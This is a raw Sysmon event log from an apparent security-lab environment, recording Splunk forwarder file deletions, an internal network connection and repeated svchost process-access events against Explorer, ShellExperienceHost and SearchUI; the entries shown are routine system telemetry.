AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A4FD09DFFA991E4618DE4C8AA7720376,SHA256=EFEC4FCCFC53760D7EF1CC18C2A0DB7F383637F78C27EBC0385D9DC6CAE80B6F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000015078Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:16:58.047{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1C87870F15179A1FBF9F996BD1DCDD5D,SHA256=C78E533EA965AF9D9F87DDDE5F62E2B220B2AA65F989A1C851AF1DFF1A10099C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000039767Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:59.258{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D2A27B01869B925E80433C2DA9F2D674,SHA256=44FB13D16B1B65CD9CABADE99D8A543F6D3FC90BBD0981B148264C3D9B0DA217,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000015080Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:16:57.974{E5A8D418-DCC7-63C7-D000-00000000B002}3144C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-ctus-attack-range-933.us-east-2.compute.internal50036-false10.0.1.12ip-10-0-1-12.us-east-2.compute.internal8000- 23542300x800000000000000015079Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:16:59.144{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=73E836AA4898C4291340EAB74D3921A5,SHA256=14391891117D71323304EB611DF43214846E8B3CC82C326694C05A72021E9CF6,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000039798Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:00.940{FE4C2B44-D9F5-63C7-0D00-00000000AF02}892912C:\Windows\system32\svchost.exe{FE4C2B44-DE08-63C7-EF04-00000000AF02}6056C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+2d24d|c:\windows\system32\rpcss.dll+3a866|c:\windows\system32\rpcss.dll+3976a|c:\windows\system32\rpcss.dll+2b25e|c:\windows\system32\rpcss.dll+2a1f3|c:\windows\system32\rpcss.dll+45300|c:\windows\system32\rpcss.dll+456f2|c:\windows\system32\rpcss.dll+47fff|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000039797Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:00.940{FE4C2B44-D9F5-63C7-0D00-00000000AF02}892912C:\Windows\system32\svchost.exe{FE4C2B44-DE08-63C7-EF04-00000000AF02}6056C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+2d24d|c:\windows\system32\rpcss.dll+39644|c:\windows\system32\rpcss.dll+2b25e|c:\windows\system32\rpcss.dll+2a1f3|c:\windows\system32\rpcss.dll+45300|c:\windows\system32\rpcss.dll+456f2|c:\windows\system32\rpcss.dll+47fff|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000039796Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:00.940{FE4C2B44-D9F5-63C7-0D00-00000000AF02}892912C:\Windows\system32\svchost.exe{FE4C2B44-DE08-63C7-EF04-00000000AF02}6056C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+2d24d|c:\windows\system32\rpcss.dll+3a866|c:\windows\system32\rpcss.dll+3976a|c:\windows\system32\rpcss.dll+2b25e|c:\windows\system32\rpcss.dll+2a1f3|c:\windows\system32\rpcss.dll+45300|c:\windows\system32\rpcss.dll+456f2|c:\windows\system32\rpcss.dll+47fff|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000039795Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:00.940{FE4C2B44-D9F5-63C7-0D00-00000000AF02}892912C:\Windows\system32\svchost.exe{FE4C2B44-DE08-63C7-EF04-00000000AF02}6056C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+2d24d|c:\windows\system32\rpcss.dll+39644|c:\windows\system32\rpcss.dll+2b25e|c:\windows\system32\rpcss.dll+2a1f3|c:\windows\system32\rpcss.dll+45300|c:\windows\system32\rpcss.dll+456f2|c:\windows\system32\rpcss.dll+47fff|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000039794Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:00.940{FE4C2B44-D9F5-63C7-0D00-00000000AF02}892912C:\Windows\system32\svchost.exe{FE4C2B44-DE08-63C7-EF04-00000000AF02}6056C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+2d24d|c:\windows\system32\rpcss.dll+3a866|c:\windows\system32\rpcss.dll+3976a|c:\windows\system32\rpcss.dll+2b25e|c:\windows\system32\rpcss.dll+2a1f3|c:\windows\system32\rpcss.dll+45300|c:\windows\system32\rpcss.dll+456f2|c:\windows\system32\rpcss.dll+47fff|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000039793Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:00.940{FE4C2B44-D9F5-63C7-0D00-00000000AF02}892912C:\Windows\system32\svchost.exe{FE4C2B44-DE08-63C7-EF04-00000000AF02}6056C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+2d24d|c:\windows\system32\rpcss.dll+39644|c:\windows\system32\rpcss.dll+2b25e|c:\windows\system32\rpcss.dll+2a1f3|c:\windows\system32\rpcss.dll+45300|c:\windows\system32\rpcss.dll+456f2|c:\windows\system32\rpcss.dll+47fff|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000039792Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:00.940{FE4C2B44-D9F5-63C7-0D00-00000000AF02}892912C:\Windows\system32\svchost.exe{FE4C2B44-DE08-63C7-EF04-00000000AF02}6056C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+2d24d|c:\windows\system32\rpcss.dll+3a866|c:\windows\system32\rpcss.dll+3976a|c:\windows\system32\rpcss.dll+2b25e|c:\windows\system32\rpcss.dll+2a1f3|c:\windows\system32\rpcss.dll+45300|c:\windows\system32\rpcss.dll+456f2|c:\windows\system32\rpcss.dll+47fff|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000039791Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:00.940{FE4C2B44-D9F5-63C7-0D00-00000000AF02}892912C:\Windows\system32\svchost.exe{FE4C2B44-DE08-63C7-EF04-00000000AF02}6056C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+2d24d|c:\windows\system32\rpcss.dll+39644|c:\windows\system32\rpcss.dll+2b25e|c:\windows\system32\rpcss.dll+2a1f3|c:\windows\system32\rpcss.dll+45300|c:\windows\system32\rpcss.dll+456f2|c:\windows\system32\rpcss.dll+47fff|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000039790Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:00.940{FE4C2B44-D9F5-63C7-0D00-00000000AF02}892912C:\Windows\system32\svchost.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+2d24d|c:\windows\system32\rpcss.dll+3a866|c:\windows\system32\rpcss.dll+3976a|c:\windows\system32\rpcss.dll+2b25e|c:\windows\system32\rpcss.dll+2a1f3|c:\windows\system32\rpcss.dll+45300|c:\windows\system32\rpcss.dll+456f2|c:\windows\system32\rpcss.dll+47fff|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000039789Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:00.940{FE4C2B44-D9F5-63C7-0D00-00000000AF02}892912C:\Windows\system32\svchost.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+2d24d|c:\windows\system32\rpcss.dll+39644|c:\windows\system32\rpcss.dll+2b25e|c:\windows\system32\rpcss.dll+2a1f3|c:\windows\system32\rpcss.dll+45300|c:\windows\system32\rpcss.dll+456f2|c:\windows\system32\rpcss.dll+47fff|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000039788Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:00.940{FE4C2B44-D9F5-63C7-0D00-00000000AF02}892912C:\Windows\system32\svchost.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+2d24d|c:\windows\system32\rpcss.dll+3a866|c:\windows\system32\rpcss.dll+3976a|c:\windows\system32\rpcss.dll+2b25e|c:\windows\system32\rpcss.dll+2a1f3|c:\windows\system32\rpcss.dll+45300|c:\windows\system32\rpcss.dll+456f2|c:\windows\system32\rpcss.dll+47fff|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000039787Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:00.940{FE4C2B44-D9F5-63C7-0D00-00000000AF02}892912C:\Windows\system32\svchost.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+2d24d|c:\windows\system32\rpcss.dll+39644|c:\windows\system32\rpcss.dll+2b25e|c:\windows\system32\rpcss.dll+2a1f3|c:\windows\system32\rpcss.dll+45300|c:\windows\system32\rpcss.dll+456f2|c:\windows\system32\rpcss.dll+47fff|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000039786Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:00.940{FE4C2B44-D9F5-63C7-0D00-00000000AF02}892912C:\Windows\system32\svchost.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+2d24d|c:\windows\system32\rpcss.dll+3a866|c:\windows\system32\rpcss.dll+3976a|c:\windows\system32\rpcss.dll+2b25e|c:\windows\system32\rpcss.dll+2a1f3|c:\windows\system32\rpcss.dll+45300|c:\windows\system32\rpcss.dll+456f2|c:\windows\system32\rpcss.dll+47fff|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000039785Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:00.940{FE4C2B44-D9F5-63C7-0D00-00000000AF02}892912C:\Windows\system32\svchost.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+2d24d|c:\windows\system32\rpcss.dll+39644|c:\windows\system32\rpcss.dll+2b25e|c:\windows\system32\rpcss.dll+2a1f3|c:\windows\system32\rpcss.dll+45300|c:\windows\system32\rpcss.dll+456f2|c:\windows\system32\rpcss.dll+47fff|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000039784Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:00.940{FE4C2B44-D9F5-63C7-0D00-00000000AF02}892912C:\Windows\system32\svchost.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+2d24d|c:\windows\system32\rpcss.dll+3a866|c:\windows\system32\rpcss.dll+3976a|c:\windows\system32\rpcss.dll+2b25e|c:\windows\system32\rpcss.dll+2a1f3|c:\windows\system32\rpcss.dll+45300|c:\windows\system32\rpcss.dll+456f2|c:\windows\system32\rpcss.dll+47fff|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000039783Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:00.940{FE4C2B44-D9F5-63C7-0D00-00000000AF02}892912C:\Windows\system32\svchost.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+2d24d|c:\windows\system32\rpcss.dll+39644|c:\windows\system32\rpcss.dll+2b25e|c:\windows\system32\rpcss.dll+2a1f3|c:\windows\system32\rpcss.dll+45300|c:\windows\system32\rpcss.dll+456f2|c:\windows\system32\rpcss.dll+47fff|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000039782Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:00.940{FE4C2B44-D9F5-63C7-0D00-00000000AF02}892912C:\Windows\system32\svchost.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+2d24d|c:\windows\system32\rpcss.dll+3a866|c:\windows\system32\rpcss.dll+3976a|c:\windows\system32\rpcss.dll+2b25e|c:\windows\system32\rpcss.dll+2a1f3|c:\windows\system32\rpcss.dll+45300|c:\windows\system32\rpcss.dll+456f2|c:\windows\system32\rpcss.dll+47fff|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000039781Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:00.939{FE4C2B44-D9F5-63C7-0D00-00000000AF02}892912C:\Windows\system32\svchost.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+2d24d|c:\windows\system32\rpcss.dll+39644|c:\windows\system32\rpcss.dll+2b25e|c:\windows\system32\rpcss.dll+2a1f3|c:\windows\system32\rpcss.dll+45300|c:\windows\system32\rpcss.dll+456f2|c:\windows\system32\rpcss.dll+47fff|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000039780Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:00.939{FE4C2B44-D9F5-63C7-0D00-00000000AF02}892912C:\Windows\system32\svchost.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+2d24d|c:\windows\system32\rpcss.dll+3a866|c:\windows\system32\rpcss.dll+3976a|c:\windows\system32\rpcss.dll+2b25e|c:\windows\system32\rpcss.dll+2a1f3|c:\windows\system32\rpcss.dll+45300|c:\windows\system32\rpcss.dll+456f2|c:\windows\system32\rpcss.dll+47fff|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000039779Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:00.939{FE4C2B44-D9F5-63C7-0D00-00000000AF02}892912C:\Windows\system32\svchost.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+2d24d|c:\windows\system32\rpcss.dll+39644|c:\windows\system32\rpcss.dll+2b25e|c:\windows\system32\rpcss.dll+2a1f3|c:\windows\system32\rpcss.dll+45300|c:\windows\system32\rpcss.dll+456f2|c:\windows\system32\rpcss.dll+47fff|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000039778Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:00.939{FE4C2B44-D9F5-63C7-0D00-00000000AF02}892912C:\Windows\system32\svchost.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+2d24d|c:\windows\system32\rpcss.dll+3a866|c:\windows\system32\rpcss.dll+3976a|c:\windows\system32\rpcss.dll+2b25e|c:\windows\system32\rpcss.dll+2a1f3|c:\windows\system32\rpcss.dll+45300|c:\windows\system32\rpcss.dll+456f2|c:\windows\system32\rpcss.dll+47fff|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000039777Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:00.939{FE4C2B44-D9F5-63C7-0D00-00000000AF02}892912C:\Windows\system32\svchost.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+2d24d|c:\windows\system32\rpcss.dll+39644|c:\windows\system32\rpcss.dll+2b25e|c:\windows\system32\rpcss.dll+2a1f3|c:\windows\system32\rpcss.dll+45300|c:\windows\system32\rpcss.dll+456f2|c:\windows\system32\rpcss.dll+47fff|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000039776Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:00.939{FE4C2B44-D9F5-63C7-0D00-00000000AF02}892912C:\Windows\system32\svchost.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+2d24d|c:\windows\system32\rpcss.dll+3a866|c:\windows\system32\rpcss.dll+3976a|c:\windows\system32\rpcss.dll+2b25e|c:\windows\system32\rpcss.dll+2a1f3|c:\windows\system32\rpcss.dll+45300|c:\windows\system32\rpcss.dll+456f2|c:\windows\system32\rpcss.dll+47fff|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000039775Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:00.939{FE4C2B44-D9F5-63C7-0D00-00000000AF02}892912C:\Windows\system32\svchost.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+2d24d|c:\windows\system32\rpcss.dll+39644|c:\windows\system32\rpcss.dll+2b25e|c:\windows\system32\rpcss.dll+2a1f3|c:\windows\system32\rpcss.dll+45300|c:\windows\system32\rpcss.dll+456f2|c:\windows\system32\rpcss.dll+47fff|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000039774Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:00.939{FE4C2B44-D9F5-63C7-0D00-00000000AF02}892912C:\Windows\system32\svchost.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+2d24d|c:\windows\system32\rpcss.dll+3a866|c:\windows\system32\rpcss.dll+3976a|c:\windows\system32\rpcss.dll+2b25e|c:\windows\system32\rpcss.dll+2a1f3|c:\windows\system32\rpcss.dll+45300|c:\windows\system32\rpcss.dll+456f2|c:\windows\system32\rpcss.dll+47fff|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000039773Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:00.939{FE4C2B44-D9F5-63C7-0D00-00000000AF02}892912C:\Windows\system32\svchost.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+2d24d|c:\windows\system32\rpcss.dll+39644|c:\windows\system32\rpcss.dll+2b25e|c:\windows\system32\rpcss.dll+2a1f3|c:\windows\system32\rpcss.dll+45300|c:\windows\system32\rpcss.dll+456f2|c:\windows\system32\rpcss.dll+47fff|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000039772Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:00.939{FE4C2B44-D9F5-63C7-0D00-00000000AF02}892912C:\Windows\system32\svchost.exe{FE4C2B44-DE09-63C7-F204-00000000AF02}5228C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+2d24d|c:\windows\system32\rpcss.dll+39644|c:\windows\system32\rpcss.dll+2b25e|c:\windows\system32\rpcss.dll+2a1f3|c:\windows\system32\rpcss.dll+45300|c:\windows\system32\rpcss.dll+456f2|c:\windows\system32\rpcss.dll+47fff|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000039771Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:00.939{FE4C2B44-D9F5-63C7-0D00-00000000AF02}892912C:\Windows\system32\svchost.exe{FE4C2B44-DE09-63C7-F204-00000000AF02}5228C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+2d24d|c:\windows\system32\rpcss.dll+39644|c:\windows\system32\rpcss.dll+2b25e|c:\windows\system32\rpcss.dll+2a1f3|c:\windows\system32\rpcss.dll+45300|c:\windows\system32\rpcss.dll+456f2|c:\windows\system32\rpcss.dll+47fff|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000039770Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 